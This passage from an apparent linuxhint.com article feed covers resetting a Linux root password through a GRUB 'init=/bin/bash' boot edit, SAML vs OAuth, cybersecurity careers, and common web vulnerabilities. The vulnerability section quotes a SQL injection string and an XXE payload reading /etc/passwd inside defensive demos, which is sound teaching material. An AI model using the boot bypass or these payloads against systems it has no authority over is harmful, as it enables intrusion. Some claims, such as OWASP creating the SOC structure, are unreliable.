Restart the system and hold the Shift key, or repeatedly press the Esc key, during boot to enter recovery mode. You will then see the GRUB menu, as shown in the following screenshot.

Next, navigate to the Advanced options.

Then, to switch to the edit window, press ‘e’ on the keyboard.

You will see the following screen:

Scroll down the screen until you see the following line:

“linux /boot/vmlinuz-5.4.0-26-generic root=UUID=352d26aa-051e-4dbe-adb2-7fbb843f6581 ro quiet splash”

Replace ‘ro‘ with ‘rw’ in the above line and, at the end of the line, append ‘init=/bin/bash’. It should now look like this:

“linux /boot/vmlinuz-5.4.0-26-generic root=UUID=352d26aa-051e-4dbe-adb2-7fbb843f6581 rw quiet splash init=/bin/bash”

Adding ‘rw’ and ‘init=/bin/bash’ in the above line basically tells the system to log in to bash with read/write privileges. Note that this configuration will only apply for the current boot, not for subsequent boots.

Now, use the F10 key or the Ctrl+X shortcut to boot up to a command prompt, as shown in the following screenshot.

In the command prompt that appears, type the following command:

$ passwd root

You will be prompted for the root password. Input the root password and press the Enter key. Then, retype the password and press Enter to avoid any typos.

Note: You can change not only the root password but also any user’s password using this process.

After entering the password, you will then see a message stating that the new password has been updated.

Finally, use the Ctrl+Alt+Delete shortcut or type the following command at the command prompt to exit and reboot your system.

exec /sbin/init

That is all you need to do to change or reset the root password of your Linux Mint 20 system without the sudo or root login. It is good practice to change the password frequently after some time, especially if you think it has been compromised.

Conclusion

In this article, we have identified three different methods to modify or reset the root password on your system. You can opt for any method, based on the privileges you have. If you have the root password or sudo privileges, you can easily reset the root password using the simple ‘passwd’ command. Otherwise, you can use the GRUB menu to change the root password, but only if you have physical access to the system.

I hope this article has helped you in changing or resetting the root password of your system.

]]>
SAML vs. OAUTH https://linuxhint.com/saml_vs_oauth/ Tue, 20 Oct 2020 04:31:58 +0000 https://linuxhint.com/?p=72438 SAML and OAUTH are technical standards for authenticating and authorizing users. These standards are used by web application developers, security professionals, and system administrators who want to improve their identity management service and enhance the methods by which clients can access resources with a set of credentials. In cases where access to an application from a portal is needed, there is a need for a centralized identity source, or Enterprise Single Sign On; in such cases, SAML is preferable. In cases where temporary access to resources such as accounts or files is needed, OAUTH is considered the better choice, and in mobile use cases, OAUTH is mostly used. Both SAML (Security Assertion Markup Language) and OAUTH (Open Authorization) are used for web Single Sign On, providing single sign-on across multiple web applications.

SAML

SAML allows web applications’ SSO providers to transfer credentials between the Identity Provider (IdP), which holds the credentials, and the Service Provider (SP), which is the resource that needs those credentials. SAML is a standard authentication and authorization protocol language that is mostly used to perform federation and identity management, along with Single Sign On management. In SAML, XML documents are used as tokens asserting the client’s identity. The SAML authentication and authorization process is as follows:

  1. The user requests to log into the service via the browser.
  2. The service informs the browser that it is authenticating to a specific Identity Provider (IdP) registered with the service.
  3. The browser relays the authentication request to the registered Identity Providers for login and authentication.
  4. Upon successful credential/authentication check, the IdP generates an XML-based assertion document verifying the user’s identity and relays this to the browser.
  5. The browser relays the assertion to the Service Provider.
  6. The Service Provider (SP) accepts the assertion for entry and allows the user access to the service by logging them in.

Now, let us look at a real-life example. Suppose a user clicks the Login option on the image-sharing service on the website abc.com. To authenticate the user, an encrypted SAML authentication request is made by abc.com. The request will be sent from the website directly to the authorization server (IdP). Here, the Service Provider will redirect the user to the IdP for authorization. The IdP will verify the received SAML authentication request, and if the request turns out valid, it will present the user with a login form to enter the credentials. After the user enters the credentials, the IdP will generate a SAML assertion or SAML token containing the user’s data and identity and will send it to the Service Provider. The Service Provider (SP) verifies the SAML assertion and extracts the data and identity of the user, assigns the correct permissions to the user, and logs the user into the service.

Web Application developers can use SAML plugins to ensure that the app and resource both follow the needed Single Sign On practices. This will make for a better user login experience and more effective security practices that leverage a common identity strategy. With SAML in place, only users with the correct identity and assertion token can access the resource.

OAUTH

OAUTH is used when there is a need to pass authorization from one service to another service without sharing the actual credentials, like the password and username. Using OAUTH, users can sign in on a single service, access the resources of other services, and perform actions on the service. OAUTH is the best method used to pass authorization from a Single Sign On platform to another service or platform, or between any two web applications. The OAUTH workflow is as follows:

  1. The user clicks the Login button of a resource sharing service.
  2. The resource server shows the user an authorization grant and redirects the user to the authorization server.
  3. The user requests an access token from the authorization server using the authorization grant code.
  4. If the code is valid after logging into the authorization server, the user will get an access token that can be used to retrieve or access a protected resource from the resource server.
  5. On receiving a request for a protected resource with an access grant token, the validity of the access token is checked by the resource server with the help of the authorization server.
  6. If the token is valid and passes all the checks, the protected resource is granted by the resource server.
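Step 3 of this flow is an ordinary HTTP POST to the authorization server’s token endpoint. A sketch of the request, with every name and value illustrative:

```http
POST /oauth/token HTTP/1.1
Host: auth.example.com
Content-Type: application/x-www-form-urlencoded

grant_type=authorization_code&code=AUTH_CODE&client_id=CLIENT_ID&client_secret=CLIENT_SECRET&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcallback
```

A successful response returns a JSON body containing the access token, which the client then presents to the resource server in step 5.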

One common use of OAUTH is allowing a web application to access a social media platform or other online account. Google user accounts can be used with many consumer applications for several different reasons, such as blogging, online gaming, logging in with social media accounts, and reading articles on news websites. In these cases, OAUTH works in the background, so that these external entities can be linked and can access the necessary data.

OAUTH is a necessity, as there must be a way to send authorization info between different applications without sharing or exposing user credentials. OAUTH is also used in businesses. For example, suppose a user needs to access a company’s Single Sign On system with their username and password. The SSO gives it access to all the needed resources by passing OAUTH authorization tokens to these apps or resources.

Conclusion

OAUTH and SAML are both very important from a web application developer’s or system administrator’s point of view, yet they are very different tools with different functions. OAUTH is a protocol for access authorization, while SAML is an XML-based standard for exchanging authentication and authorization data, with authentication as its primary focus.

]]>
Cybersecurity Career Paths https://linuxhint.com/cybersecurity_career_paths/ Tue, 06 Oct 2020 18:33:13 +0000 https://linuxhint.com/?p=69984 With recent innovations in computing technology, every company has deployed their services to the cloud. Networks have risen to an unfathomable scale. Almost every company now holds thousands of terabytes of critical data regarding their customers and clients in the cloud. While this age of networks and big data has created a lot of ease for people, if not stored properly, the confidential data of millions of individuals could become exposed to malicious parties.

This has created a large demand for cybersecurity experts. Companies spend millions of dollars hiring cybersecurity experts to safeguard and maintain their servers and to prevent unauthorized access to confidential data. Therefore, cybersecurity has become a lucrative career path for rookie and veteran IT experts alike.

The IT industry is heavily invested in industrial security to protect sensitive information for businesses, both big and small. It would be foolish to ignore the horizon of cybersecurity career paths in the near future.

What is Cybersecurity?

Cybersecurity is the exercise of protecting networks and computers from BlackHat hackers and threat actors. Hackers may try to access, delete, or alter sensitive information that is stored on servers.

It is the job of cybersecurity experts to prevent any sort of data breach. It is their responsibility to analyze all possible ways that a malicious party can access your data. Cybersecurity analysts seek to create methods, rules, and frameworks to stop such attacks from occurring.

Cyberattacks are one of the fastest-growing crimes in the Western world, consistently building up in size, sophistication, and intensity. It is a no-brainer that companies are prepared to spend hundreds of thousands of dollars hiring the best cybersecurity professionals to protect their million-dollar empires.

Cybersecurity Careers in 2021

Cybersecurity itself is a very broad umbrella field, consisting of many smaller fields that focus on specific aspects of security. For someone new to cybersecurity, it can be daunting to determine which career path to take.

In this article, we have compiled a list of the most in-demand cybersecurity career paths in the market.

1. Penetration Testing

Penetration testing is one of the trendiest jobs in the world. If you are familiar with cybersecurity, you might have already heard of this term or other similar terms, like ethical hacking and security testing. These terms all mean the same thing.

What Does a Penetration Tester Do?

The job of a penetration tester is to ‘penetrate’ an organization’s systems to discover any vulnerabilities and exploits that might exist in that system.

A penetration tester first plans out all possible methods and ways to exploit the vulnerabilities of a system. The penetration tester then uses all possible tools at his or her disposal to emulate malicious attacks on the system. He or she might use software tools to hack misconfigured ports, or rely on social engineering to get a password from an employee.

After the penetration tester is done performing all the necessary tests, he or she compiles a report detailing the tests that were performed and the responses received, as well as how any noted exploits were found. Then, the pen tester reports these findings so that a system or network administrator can patch the holes in the network.

What is the Demand for Penetration Testers?

Due to the ever-growing market of cloud-based technologies, everything is slowly becoming network-based. This has resulted in a higher-than-ever demand for cybersecurity experts. According to the U.S. Bureau of Labor Statistics, Information Security analysts, an umbrella category for cybersecurity-related jobs, have a projected percent change in employment of 31% from 2019 to 2029.

This is much higher than the average of 4% for other jobs. This means that if you decide to be a penetration tester, you can be sure that your skills will not become irrelevant 5 to 10 years down the line.

How Much Do Penetration Testers Earn?

According to PayScale, a leading website in salary assessment, the average yearly salary of a penetration tester is $85,134. This estimation is highly dependent on personal factors, such as the location of the job, your own experience level, and the industry that you work in.

How to Start a Career in Penetration Testing

The most important thing to have as a penetration tester is knowledge of how computer systems work. The better that you understand what makes or breaks a system, the better you can become at penetration testing.

To this end, having a bachelor’s degree in Computer Science, Cybersecurity, Networking, or any other IT-related field can be a big bonus for securing a job in penetration testing. But, that is not all. Certifications are often just as important in cybersecurity fields as degrees. Getting a certification in penetration testing can boost your reputation for potential hiring companies. Some good certifications include the PenTest+ offered by CompTia and the certification by the GIAC, but the most famous certifications are offered by Offensive Security (the makers of Kali Linux).

Most companies will not hire you if you have no experience in managing computer systems, so becoming a system or network administrator, gaining experience, and slowly transitioning into a penetration testing field is a great place to start.

2. Forensic Investigation

When it comes to crime, it is no surprise that much of it now happens digitally. It is a forensic investigator's job to track criminal activity on a network or device.

What Do Forensic Investigators Do?

The job of a forensic investigator is to gather evidence from a computer device for an investigation. The skills of a forensic investigator are necessary in the field of law where, in modern times, a lot of evidence is on computers.

Evidence of security breaches and DDOS attacks can most often be found left on servers, and it is the job of the forensic investigator to gather all the evidence and link it together to create a picture of what exactly happened.

A forensic investigator does this by copying all the data on the targeted device as an image and analyzing the data on this image, such as access dates of files, modification dates, data in unused space, deleted data, etc. These things help the forensic investigator to create a final report, analyzing everything that has been found, and providing system administrators and law teams with a clear picture of the data breach.

Importance of Forensic Investigators in the IT Industry

Forensic investigators have a specialized role in the IT community. Unlike penetration testers, who work to prevent security breaches, forensic experts do not prevent hacks but, rather, help in the aftermath. These professionals have the responsibility of finding who might have performed the hack and providing law teams with the evidence.

While the demand is lower than for other career paths in this list, the demand for cyber forensic experts is still very high, with a growth of 32% in job demand expected by the end of 2029. This job is in particular demand among law enforcement agencies, such as the FBI.

How Much Do Forensic Investigators Earn?

PayScale mentions on its website that an average forensic investigator earns $73,892. This pay depends on many factors, such as experience and industry. The yearly salary can range from around $50,000 for beginners to up to $118,000 for experienced professionals.

How to Become a Forensic Investigator

A base requirement for becoming a forensic investigator is an undergraduate degree in a field such as Computer Science or Computer Engineering. This provides the core foundation of knowledge in programming and computer systems that is required for any aspiring forensic investigator. Specialization in Cybersecurity in your degree can also be a big plus in the eyes of prospective employers.

Certifications for Cyber Forensics are a great way to show that you have the necessary skillset to become a Forensic investigator. These can be incredibly helpful in landing a job. Organizations like the International Association of Computer Investigation Specialists (IACIS) and AccessData provide useful, reputable certifications for forensic investigators.

Lastly, strong analytical and investigational skills can go a long way in helping you to develop your career. Gaining more experience in the field is vital to helping you develop such skills.

3. Risk Assessment

Businesses are always vulnerable to risks and data breaches. One wrong step and you can lose a lot of capital. Risk management is critical to every organization, and the process starts at risk assessment.

What Do Risk Assessors Do?

As the name indicates, risk management is primarily a proactive approach to analyzing potential threats and risks to a business. The main job of a risk assessor is to keep tabs on the risk profiles of an organization's IT resources.

A risk assessor determines the impact that a security or data compromise would have on an organization. He or she then collaborates with a Vulnerability Management team to reduce risks to an acceptable level and take proactive measures.

An organization may or may not be familiar with the importance of some systems for their existence. A Risk Assessor must use his or her analysis capabilities to analyze levels of dependency in different areas of the company.

For example, a programmer may consider a single library to not be as important to the system, but a failure inside this library may result in a failure of the entire system. Most organizations cannot afford such system failures, so they hire risk assessment experts to analyze these risks.

What is the Demand for Risk Assessment Specialists?

The overall market for risk management and assessment specialists has been growing for the last 15 years, at an average rate of about 4.85% per year, and this trend shows no sign of slowing. More than 15,000 jobs have been posted with requirements for a risk assessment specialist.

How Much Do Risk Assessment Specialists Earn?

Although total earnings can be as steep as $187,000 and as little as $27,500, many salaries for risk assessment specialists fall between $69,000 (25th percentile) and $133,000 (75th percentile) in the United States. The overall pay range for a risk assessor varies wildly (up to $64,000), which implies that there may be fewer skill-based growth opportunities, but it is still possible to increase pay based on location and years of experience. [1][2]

How to Become a Risk Assessment Specialist

Risk analysis jobs require a minimum of an undergraduate degree in Computer Science, Programming, Business, Finance, or a related field. A cybersecurity risk analysis expert should be comfortable with software architecture and operating systems. Most importantly, a risk assessor must be familiar with programming languages and logic building.

Larger Institutions and multinational organizations may prefer a Master’s graduate degree or even an MBA in Information Systems. System Analysis and comprehension of existing Risk Management capabilities inside an organization is a must for any risk assessment specialist.

4. SOC (Defense Security)

Cybersecurity remains one of the biggest IT industries, and many organizations have invested millions in the research and development of an effective Information Security framework. Security Operation Center, or SOC, is one of the most popular InfoSec frameworks, and with good reason.

What Does a SOC Defense Security Specialist Do?

Recently, the OWASP Project for web app security has created the Security Operation Center (SOC) structure for companies to mitigate cyber-attacks using appropriate technical regulations.

In addition to responding to cybersecurity incidents, the other main goals of a SOC include making an organization resilient to future threats, providing effective security controls, and allowing prompt detection of threats.

How Much Do SOC Defense Security Specialists Earn?

SOC is a niche field that sees relatively little demand in the market but pays very well. A typical cybersecurity defense specialist working in a SOC earns about $120,000 per year. As an entry-level SOC expert, you may expect a salary ranging from $84,000 to $150,000. [1][2]

How to Become a Defense Security Specialist

Since a SOC specialist in Defense Security is a fundamentally complex role in the world of cybersecurity, there are many career paths that you can follow at first, and rise up through the ranks into a specific SOC role.

Some companies require an undergraduate degree and at least 4-5 years of work experience for an entry-level role in SOC. A technical bachelor’s degree can help you get into the cybersecurity industry and move your way up into a role in SOC. Having a master’s degree specializing in cybersecurity or the approved certifications will prove invaluable to start your career.

5. Malware Analyst (Reverse Engineering)

Imagine you are working with a big organization and there is a lot of sensitive information on your laptop. Suppose you are attacked by malware and you send the laptop to the cybersecurity department, only to hear that they have never seen this malware before. This is where a Malware Analyst offers his or her expertise.

What Does a Malware Analyst Do?

A malware analyst is tasked with analyzing malware, trojans, worms, spyware, and other such malicious programs to understand how they work. A malware analyst works by decompiling and deconstructing malware.

This might be performed by running the malware in a sandboxed environment and seeing what it changes. Otherwise, the analyst could run the malware through a debugger and try to understand the process and purpose of the malicious program. Malware analysts employ a variety of techniques and tools to reverse-engineer viruses.

Malware analysts are very important for modern internet infrastructure. It is the job of malware analysts to deconstruct a virus to understand what makes it work. They use this information to generate a signature for the malware, which is used by antivirus programs on millions of computers to identify malicious software as it enters the system.

How Much Do Malware Analysts Earn?

The salary of the average malware analyst is an astounding $92,880, according to PayScale. This is much higher than the average. The starting salary of $66,000 is also way above the average salary of cybersecurity experts.

With the growing market of anti-viruses, malware analysts can rest assured that their skills are not only in demand today, but will also be in the future. [1][2]

How to Become a Malware Analyst

As in all cybersecurity careers, a bachelor’s degree in computer science or computer engineering is a must for this career path. You should especially focus on Operating Systems, Computer Architecture, and other subjects that are needed to understand low-level programming. A good understanding of Debuggers, Assembly Language, and all other Interpreted and Compiled languages, in addition to previous malware analysis work, can also help in developing the necessary skillset to become a malware analyst.

Certifications for malware analysts include the GIAC Reverse Engineering Malware (GREM) certification and the Certified Information Systems Security Professional (CISSP). These are two great certifications to have in your resume.

6. Incident Response Analyst

Have you ever wondered what happens when a cyber-attack occurs? How do companies and businesses perform damage control? They have a dedicated incident response analyst team at their disposal that helps them respond appropriately to the incoming attack while minimizing the damage.

What Does an Incident Response Analyst Do?

An incident response analyst works with a response team to determine and evaluate cyber threats to the security systems of an organization. An incident response analyst is also responsible for avoiding escalation of serious security threats, providing reports to the security team of the organization, using tools to minimize the impact of a security breach on the computer network, and conducting analysis to ensure that the computer network of the organization is clear of threats.

The duties of an incident response analyst also include implementing and optimizing security tools to avoid the recurrence of safety problems. An incident response analyst may also communicate about security threats with law enforcement, if necessary.

The incident responder is responsible for using digital forensics tools to evaluate and analyze digital media in cases of suspected computer hacking. The responder then reports the results in an easy-to-read format. Because many computer-related concepts can be very technical, it is essential to create the reports in words that everyone can understand. The reports could eventually be used as proof in legal cases.

Incident responders may also be called as fact or expert witnesses to testify in court. They may also work with outside departments to develop incident remediation solutions.

How Much Does an Incident Response Analyst Earn?

Recent surveys show pay rates as high as $115,000+ for incident response analysts, while PayScale reports an average yearly wage of $80,247. Top-paying industries include finance and banking, enterprise and consulting, and IT. According to PayScale, you are most likely to get an incident response analyst job in cities like New York, Atlanta, and Seattle, while Cisco, BoA, and Covestic are among the highest-paying employers for such jobs. [1][2]

How to Become an Incident Response Analyst

The most important part of being an Incident Responder is to react appropriately to compromising circumstances. Soft skills, such as adaptability, perseverance, and, most importantly, a good understanding of the field is extremely important to this profession. Additionally, communication is also a key factor in this field, as analysts must communicate about incidents to law enforcement agents and corporate sectors. Most companies hiring security incident response analysts will look for such qualities.

The qualification requirements for incident analysts include a bachelor’s degree in Computer Science or Cybersecurity. You must have at least two to three years of work experience in the cybersecurity industry before you can be hired as an incident response analyst. You would also be required to be experienced in security technologies, such as SSL, HTTP, and HTTPS, along with an understanding of major operating systems, including Windows, Linux, and Mac OS.

Next Steps

There is more advanced technology on your smartphone than it took to land a man on the moon. Half a century ago, the idea of a hand-held mobile device would be considered fiction. With technology changing so fast, everyone’s privacy is now under threat of attack, especially since most data is digital and stored online.

It does not come as a surprise how much the cybersecurity industry has grown in the last decade, and how much this field is expected to continue to grow. There are a lot of Cybersecurity career paths that you can choose from and a lot of room for you to grow in. We advise you to start learning today. Take one tiny step at a time, and without even realizing, you will be a mile from where you began. If you work hard enough, there is no doubt you can achieve your dream profession.

References

  1. https://www.ziprecruiter.com/Salaries/Risk-Assessor-Salary
  2. https://www.salary.com/research/salary/recruiting/risk-assessment-specialist-salary/san-jose-ca
10 Types of Security Vulnerabilities https://linuxhint.com/common_security_vulnerabilities/ Tue, 29 Sep 2020 13:56:00 +0000 https://linuxhint.com/?p=69149 A security vulnerability is an unintended or accidental flaw in software code or a system that makes it potentially exploitable, granting access to illegitimate users or enabling malicious behavior such as viruses, trojans, worms, or other malware. Running software that has already been exploited, or using weak or default passwords, also leaves a system vulnerable to the outside world. These types of security vulnerabilities require patching to prevent hackers from reusing old exploits to gain unauthorized access to the system. A security vulnerability, also called a security hole or weakness, is a flaw, bug, or fault in the implementation, design, or architecture of a web application or server which, when left unaddressed, can compromise the system and leave the whole network open to attack. Those affected include the application owner, application users, and anyone else relying on the application. Let's look at the most dangerous and common security risks to web applications.

Table of Contents

  1. Database Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XEE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging and Monitoring

Database Injection:

Injection flaws occur when untrusted data is sent to an interpreter as part of a command through any channel that takes user input, e.g., a form field or another data submission area. An attacker's malicious queries can trick the interpreter into executing commands that reveal confidential data the user has no authorization to view. For example, in an SQL injection attack, when form input is not properly sanitized, an attacker can enter the SQL database and access its contents without authorization, just by entering malicious SQL code in a form that expects plaintext. Any field that takes user input is injectable, e.g., parameters, environment variables, all web services, etc.

An application is vulnerable to injection attacks when user-supplied data is not sanitized and validated, when dynamic queries are used without context-aware escaping, or when hostile data is used directly. Injection flaws can easily be discovered by examining code and by using automated tools like scanners and fuzzers. To prevent injection attacks, several measures can be taken, such as separating data from commands and queries, using a safe API that provides a parameterized interface, using "white-list" server-side input validation through tools like Snort, and escaping special characters using a specific escape syntax.
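As a minimal sketch of the parameterized-interface defense, using Python's built-in sqlite3 module (the table, data, and payload here are hypothetical examples, not from any real application):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "' OR '1'='1"  # a classic SQL injection payload

# VULNERABLE: building the query by string concatenation would let the
# payload rewrite the WHERE clause and dump every row:
#   f"SELECT secret FROM users WHERE name = '{user_input}'"

# SAFE: a parameterized query treats the input strictly as data
rows = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (user_input,)
).fetchall()
print(rows)  # → [] (no match; the payload was never executed as SQL)
```

The `?` placeholder is the parameterized interface: the driver binds the value after the SQL has been parsed, so no user input can change the query's structure.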

An injection attack can lead to massive data loss, disclosure of confidential information, denial of access, and even a complete application takeover. Some SQL controls, like LIMIT, can be used to limit the amount of data lost in an attack. Types of injection attacks include SQL, OS, NoSQL, and LDAP injection.

Broken authentication:

Attackers can access user accounts, and can even compromise the whole host system through admin accounts, by exploiting vulnerabilities in authentication systems. Authentication flaws allow an attacker to compromise passwords, session tokens, and authentication keys, and can be chained with other attacks leading to unauthorized access to any other user's account or session, temporarily or, in some cases, permanently. Let's say an attacker has a wordlist or dictionary of millions of valid usernames and passwords obtained during a breach. Using automated tools and scripts against the login system, he or she can try them one by one in very little time to see whether any of them work. Poor implementation of identity management and access controls leads to vulnerabilities like broken authentication.

An application is vulnerable to authentication attacks when it permits trying different usernames and passwords, permits dictionary or brute-force attacks without any defense strategy, uses easy or default passwords or passwords that were leaked in a breach, exposes session IDs in the URL, uses a poor password recovery scheme, or uses predictable session cookies. Broken authentication can be exploited easily using simple brute-forcing and dictionary-attack tools with a good dictionary. These types of attacks can be prevented by using multi-factor authentication, implementing weak-password checks by running passwords against a database of bad passwords, not using default credentials, enforcing a password complexity policy, and using a good server-side session manager that generates a new random session ID after login.
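One defense strategy against brute-force and dictionary attacks is a lockout window that counts recent failed logins. A minimal sketch in Python (the thresholds and in-memory store are illustrative assumptions; a real system would persist this per account):

```python
import time
from collections import defaultdict

MAX_ATTEMPTS = 5
LOCKOUT_SECONDS = 300
failed = defaultdict(list)  # username -> timestamps of recent failed logins

def record_failure(username, now=None):
    failed[username].append(now if now is not None else time.time())

def allow_login_attempt(username, now=None):
    now = now if now is not None else time.time()
    # Keep only failures inside the lockout window, then count them
    failed[username] = [t for t in failed[username] if now - t < LOCKOUT_SECONDS]
    return len(failed[username]) < MAX_ATTEMPTS

for _ in range(5):
    record_failure("alice", now=1000.0)
print(allow_login_attempt("alice", now=1001.0))  # False: account locked out
print(allow_login_attempt("alice", now=1400.0))  # True: window has expired
```

Because the counter lives server-side, an attacker running a wordlist against the login form is throttled after a handful of guesses rather than millions.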

A broken authentication vulnerability can result in the compromise of a few user accounts and an admin account, which is all an attacker needs to compromise a system. These types of attacks lead to identity theft, social security fraud, money laundering, and disclosure of highly classified information. The attacks include dictionary attacks, brute-forcing, session hijacking, and session management attacks.

Sensitive data exposure:

Sometimes web applications do not protect sensitive data and information, such as passwords and database credentials. An attacker can easily steal or modify these weakly protected credentials and use them for illegitimate purposes. Sensitive data should be encrypted at rest and in transit and should have an extra layer of security; otherwise, attackers can steal it. Attackers can get their hands on exposed sensitive data and steal hashed or cleartext user and database credentials from the server or a web browser. For example, if a password database uses unsalted or simple hashes to store passwords, a file upload flaw can allow an attacker to retrieve the password database, which will lead to exposure of all the passwords via a rainbow table of pre-calculated hashes.

The main flaw is not only that the data is unencrypted; even when it is encrypted, weak key generation, weak hashing algorithms, and weak cipher usage can enable these very common attacks. To prevent them, first classify which kinds of data are sensitive according to the applicable privacy laws, then apply controls according to that classification. Avoid storing classified data you don't need, and discard it as soon as it has served its purpose. For data in transit, encrypt it with secure protocols, e.g., TLS with PFS ciphers.
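Proper password storage counters the rainbow-table scenario above: a per-user random salt plus a slow key-derivation function. A minimal sketch using Python's stdlib (the iteration count is an illustrative choice):

```python
import hashlib
import hmac
import secrets

def hash_password(password, salt=None):
    # A per-user random salt defeats precomputed rainbow tables;
    # PBKDF2's many iterations make brute-forcing each hash slow
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest

def verify_password(password, salt, digest):
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(digest, candidate)  # constant-time comparison

salt, digest = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, digest))  # True
print(verify_password("hunter2", salt, digest))                       # False
```

Only the salt and digest are stored; even if the database leaks, each password must be attacked individually and slowly.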

These types of vulnerabilities can result in the exposure of highly sensitive information like credit card credentials, health records, passwords, and any other personal data that can lead to identity theft and bank fraud, etc.

XML External Entities (XEE):

Poorly configured XML processors resolve external entity references inside XML documents. These external entities can be used to retrieve the contents of internal files, such as the /etc/passwd file, or to perform other malicious tasks. Vulnerable XML processors can easily be exploited if an attacker can upload an XML document or include hostile content in XML. These vulnerable XML entities can be discovered using SAST and DAST tools, or manually by inspecting dependencies and configurations.

A web application is vulnerable to XEE attacks for many reasons, e.g., if the application accepts direct XML input from untrusted sources, if Document Type Definitions (DTDs) are enabled in the application, or if the application uses SAML for identity processing (since SAML uses XML for identity assertions). XEE attacks can be mitigated by avoiding serialization of sensitive data, using less complicated data formats such as JSON, patching the XML processors and libraries the application is currently using, disabling DTDs in all XML parsers, and validating XML file upload functionality using XSD verification.
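To illustrate what a hardened parser does with such input, here is a classic XXE payload fed to Python's stdlib ElementTree, which refuses to resolve external entities (the payload is a textbook example, not taken from a real attack):

```python
import xml.etree.ElementTree as ET

# A classic XXE payload: the external entity tries to pull in /etc/passwd
payload = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>"""

try:
    ET.fromstring(payload)
    print("entity was expanded (parser is vulnerable)")
except ET.ParseError as err:
    # Python's ElementTree does not fetch external entities, so the
    # undefined reference &xxe; is rejected instead of resolved
    print("payload rejected:", err)
```

A parser that did resolve the entity would return the file's contents inside `<foo>`; disabling DTD/external-entity processing, as recommended above, is exactly what makes this rejection happen.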

An application vulnerable to these types of attacks can be subject to denial-of-service attacks such as the Billion Laughs attack, scanning of internal systems and ports, and remote command execution affecting all application data.

Broken Access Control:

Access control means giving users privileges to perform specific tasks. A broken access control vulnerability arises when users are not properly restricted in the tasks they can perform. Attackers can exploit this vulnerability to access unauthorized functionality or information. Let's say a web application allows a user to switch the account he or she is logged in to just by changing the URL to another user's account, without further verification. Exploiting an access control vulnerability is a go-to attack for any attacker; the vulnerability can be found manually as well as by using SAST and DAST tools. These vulnerabilities persist due to a lack of testing and automated detection in web applications, although the best way to find them is manually.

Such vulnerabilities include privilege escalation, i.e., acting as a user you are not, or acting as an admin while you are an ordinary user; bypassing access control checks just by modifying the URL or the application's state; metadata manipulation; and allowing the primary key to be changed to another user's primary key. To prevent these kinds of attacks, access control mechanisms must be implemented in server-side code, where attackers cannot modify them. Enforcing unique application business limits via domain models, disabling directory listing on the server, alerting the admin on repeated failed login attempts, and invalidating JWT tokens after logout must also be ensured to mitigate these kinds of attacks.
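The server-side check looks like this in miniature: every fetch re-verifies that the session's user actually owns the resource named in the request (the document store and IDs here are hypothetical):

```python
from dataclasses import dataclass

@dataclass
class Document:
    owner_id: int
    body: str

DOCS = {1: Document(owner_id=42, body="alice's private notes")}

def get_document(session_user_id, doc_id):
    doc = DOCS[doc_id]
    # The ownership check lives on the server, where an attacker cannot
    # bypass it by editing the URL or client-side state
    if doc.owner_id != session_user_id:
        raise PermissionError("access denied")
    return doc.body

print(get_document(42, 1))   # the owner is allowed
try:
    get_document(7, 1)       # another user tampering with doc_id in the URL
except PermissionError as err:
    print("blocked:", err)
```

The key design point is that `session_user_id` comes from the authenticated session, never from anything the client can edit.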

Attackers can act as another user or administrator using this vulnerability to perform malicious tasks like creating, deleting and modifying records, etc. Massive data loss can occur if the data is not secured even after a breach.

Security misconfiguration:

The most common vulnerability is security misconfiguration. The main causes of this vulnerability are the use of default configurations, incomplete configurations, ad-hoc configurations, poorly configured HTTP headers, and verbose error messages containing more information than the user should be given. Security misconfigurations can occur at any level of a web application: database, web server, application server, network services, etc. Attackers can exploit unpatched systems or access unprotected files and directories to gain an unauthorized hold on the system. For example, an application's excessively verbose error messages help an attacker learn about vulnerabilities in the application and the way it works. Automated tools and scanners can be used to detect these types of security flaws.

A web application contains this type of vulnerability if it is missing security hardening measures in any part of the application, if unnecessary ports are open or unnecessary features are enabled, if default passwords are used, if error handling reveals overly informative errors to the attacker, or if it is using unpatched or outdated security software. Misconfiguration can be prevented by removing unnecessary features from the code (i.e., a minimal platform without unnecessary features or documentation), updating and patching security holes as part of the patch management process, using a process to verify the effectiveness of the security measures taken, and using a repeatable hardening process that makes it easy to deploy another, properly locked-down environment.
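The verbose-error-message problem has a simple general fix: log full details server-side, return a generic message to the client. A sketch of that pattern (the handler and response shape are illustrative, not a specific framework's API):

```python
import logging
import traceback

log = logging.getLogger("app")

def handle_request(fn):
    try:
        return fn()
    except Exception:
        # Operators get the full traceback in the server log...
        log.error("unhandled error:\n%s", traceback.format_exc())
        # ...but the client response never leaks stack traces, file
        # paths, or library versions that would aid an attacker
        return {"status": 500, "error": "Internal server error"}

print(handle_request(lambda: 1 / 0))
```

Frameworks usually offer this via a "debug mode" switch; leaving debug mode on in production is the textbook misconfiguration this guards against.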

These types of vulnerabilities or flaws allow the attacker to gain unauthorized access to system data, which leads to complete compromise of the system.

Cross-Site Scripting (XSS):

XSS vulnerabilities occur when a web application includes untrusted data in a new web page without proper validation or escaping, or updates an existing page with user-provided data using a browser API that can create HTML or JavaScript. XSS flaws also occur when a website allows a user to add custom code to a URL path that can be seen by other users. These flaws are used to run malicious JavaScript code in the target's browser. For example, an attacker could send the victim a link to a bank's website with malicious JavaScript code embedded in it. If the bank's web page is not properly secured against XSS attacks, then clicking the link will run the malicious code in the victim's browser.

Cross-site scripting is a security vulnerability present in almost ⅔ of web applications. An application is vulnerable to XSS if it stores unsanitized user input that can be seen by another user; JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable information in a page are vulnerable to DOM XSS. XSS attacks can be mitigated by using frameworks that escape and sanitize input by design, such as React; learning the limitations of those frameworks and covering the gaps yourself; escaping unnecessary and untrusted HTML data everywhere (in HTML attributes, URIs, JavaScript, etc.); and using context-sensitive encoding when modifying the document on the client side.
